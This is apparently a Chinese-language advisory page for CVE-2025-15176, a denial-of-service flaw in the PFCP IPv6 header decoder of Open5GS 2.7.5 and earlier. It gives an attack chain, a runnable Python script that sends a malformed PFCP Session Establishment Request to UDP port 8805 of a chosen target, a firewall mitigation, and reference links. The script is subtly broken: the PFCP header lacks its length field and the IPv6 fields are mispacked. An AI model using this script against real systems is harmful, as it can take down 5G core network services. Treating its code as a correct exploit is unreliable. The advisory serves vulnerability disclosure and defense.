CVE-2025-15176 Open5GS PFCP组件IPv6头部解码断言拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-15176

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

CVE-2025-15176是Open5GS中存在的拒绝服务漏洞，存在于PFCP（Packet Forwarding Control Protocol）会话建立请求处理器的IPv6头部解码功能中。该漏洞影响Open5GS 2.7.5及之前版本，攻击者可构造恶意的PFCP会话建立请求，触发decode_ipv6_header函数中的断言失败，导致服务中断。由于PFCP协议是5G核心网中用户面功能的关键协议，该漏洞可被远程利用，无需认证即可实施攻击，对5G网络的可用性造成影响。

技术细节

该漏洞位于Open5GS的lib/pfcp/rule-match.c文件中，具体受影响的函数为decode_ipv6_header和ogs_pfcp_pdr_rule_find_by_packet。漏洞根源在于PFCP会话建立请求处理过程中，对IPv6数据包头部的解析存在缺陷。攻击者可以通过构造包含畸形IPv6头部字段的PFCP数据包，触发decode_ipv6_header函数中的断言条件。该断言本应防止无效的IPv6数据包被处理，但由于验证逻辑不完善，攻击者可以构造特定输入使断言可被触发，从而导致服务进程崩溃。PFCP协议在5G核心网中负责用户面会话管理，攻击成功后将影响整个PFCP会话的可用性。

攻击链分析

STEP 1

步骤1

攻击者识别运行Open5GS且暴露PFCP端口(8805)的服务

STEP 2

步骤2

构造包含畸形IPv6头部字段的恶意PFCP会话建立请求数据包

STEP 3

步骤3

向目标Open5GS服务器发送恶意PFCP数据包，触发decode_ipv6_header函数

STEP 4

步骤4

畸形IPv6头部导致函数内部断言条件可被触发

STEP 5

步骤5

断言失败导致PFCP服务进程崩溃，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-15176 PoC - Open5GS PFCP IPv6 Header Assertion DoS
Note: This is a conceptual PoC for educational purposes only.
"""

import socket
import struct

def build_pfcp_header(message_type, sequence_num):
    """Build PFCP Header"""
    version_flags = 0x40  # Version 1
    message_type = message_type
    length = 0  # Will be filled later
    
    header = bytes([version_flags, message_type])
    header += struct.pack('>I', sequence_num)[1:4]  # Sequence number (3 bytes)
    header += bytes([0x00, 0x00])  # Spare
    return header

def build_ipv6_header_with_malformed_extension():
    """Build malformed IPv6 header to trigger assertion"""
    version_class_flow = 0x60000000
    payload_length = 0x0000
    next_header = 0x3B  # Invalid/obsolete header type
    hop_limit = 64
    
    src_addr = bytes([0x20, 0x01, 0x0d, 0xb8] + [0x00] * 12)
    dst_addr = bytes([0x20, 0x01, 0x0d, 0xb8] + [0x00] * 12)
    
    ipv6_header = struct.pack('>IHH', version_class_flow, payload_length, next_header)
    ipv6_header += bytes([hop_limit])
    ipv6_header += src_addr + dst_addr
    
    return ipv6_header

def exploit(target_ip, target_port=8805):
    """Send malicious PFCP Session Establishment Request"""
    print(f"[*] Target: {target_ip}:{target_port}")
    print(f"[*] Building malicious PFCP request...")
    
    # PFCP Header (Session Establishment Request = 0x32)
    pfcp_header = build_pfcp_header(0x32, 0x123456)
    
    # Create IE list with malformed IPv6 packet
    ie_data = build_ipv6_header_with_malformed_extension()
    
    # Combine header and IE data
    packet = pfcp_header + ie_data
    
    print(f"[*] Sending malicious packet ({len(packet)} bytes)...")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(packet, (target_ip, target_port))
        print("[+] Packet sent successfully")
        print("[*] If vulnerable, the server should crash due to assertion failure")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

Open5GS < 2.7.6

防御指南

临时缓解措施

如果无法立即升级，可通过防火墙限制对PFCP端口(8805/UDP)的访问，仅允许必要的核心网组件IP连接。同时可启用PFCP负载均衡器的健康检查，在检测到服务异常时自动重启相关进程以恢复服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15176
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15176
3 Details https://www.cvedetails.com/cve/CVE-2025-15176/
4 VulDB https://vuldb.com/cve/CVE-2025-15176
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/commit/b72d8349980076e2c033c8324f07747a86eea4f8
7 Link https://github.com/open5gs/open5gs/issues/4180
8 Link https://github.com/open5gs/open5gs/issues/4180#issue-3666760066
9 Link https://github.com/open5gs/open5gs/issues/4180#issuecomment-3615555671
10 Link https://vuldb.com/?ctiid.338561
11 Link https://vuldb.com/?id.338561
12 Link https://vuldb.com/?submit.719830